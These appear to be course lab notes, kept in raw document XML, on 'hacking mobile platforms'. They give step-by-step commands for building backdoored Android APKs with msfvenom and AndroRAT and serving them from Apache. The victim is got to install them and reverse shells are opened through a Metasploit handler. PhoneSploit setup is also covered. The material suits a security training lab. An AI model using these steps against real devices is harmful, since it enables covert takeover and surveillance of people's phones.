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Module 17: Hacking Mobile Platforms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63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Operating System: kali linux, Android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63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Android mobile (ip: 10.10.10.14)_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63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Kali linux (ip: 10.10.10.13)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63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Hacking Android using Metasploit tool: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0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Tool: metasploit (for attack) || msfvenom (for creating payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B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hanging="153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7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 the connectivity of android &amp; Kali os by pinging android from kali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7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Goto terminal &gt; open msfvenom tool for creating payload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7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Cmd “ sudo msfvenom -p android/meterpreter/reverse_tcp - -platform android LHOST=10.10.10.13  LPORT=1111 -o /var/www/html/backdoor/android-1111.apk “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7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Open new tab in terminal &gt; start apache2.service “ sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> start apache2.service”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7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Open new tab in terminal &gt; open msfconsole tool “ sudo msfconsole”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7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Cmd: use exploit/multi/handler &gt; set payload android/meterpreter/reverse_tcp  &gt;</w:t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Show options &gt; set LHOST &amp; LPORT &gt; exploit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27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android, goto browser&gt; browse (10.10.10.13/backdoor ) and download created apk &gt; download and install apk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27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kali os, check the exploit status “ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> session”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27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Result is android hacked using metasploit.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Hacking android using Phonesploit tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:ind w:left="288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kali os, goto browser &gt; goto github &gt; search Phone sploit and copy link  &gt; Git Clone and paste link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Then ls &gt; cd PhoneSploit-pro &gt; ls &gt; pip3 install -r requirements.txt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Run “ python3 phonesploitpro.py”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Hit yes &gt; explore the tool.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3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Android hacking using Androrat tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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5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kali os, goto browser &gt; goto github &gt;  search androRAT &gt; select high rating and open in new tab &gt; copy link and git clone the link &gt; ls &gt; cd androRAT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Sudo pip3 install -r requirements.txt &gt; sudo python3 androRAT.py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payload first , “ sudo python3 androRAT.py - - build -i 10.10.10.13 -p 6666 -o /var/www/html/Backdoor/rat-6666.apk”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="90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(- - build for building payload , -i for listening host , -p for listening port , -o for saving output )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new tab of terminal &gt; start apache service “sudo systemctl start apache2.service” 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android, goto browser &gt; browse (10.10.10.13/Backdoor ) and download rat-6666.apk &gt; install apk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kali os, “ sudo python3 androRAT.py - - shell -i 10.10.10.13 -p 6666 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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exploiting android from kali using - - shell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Wait for “interpreter” session &gt; run “help” command &gt; explore the session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Note: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Site to Check Android Application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(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https://sisik.eu/apk-tool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) &gt; drop apk / select apk file to check </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="1440" w:left="144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sik.eu/apk-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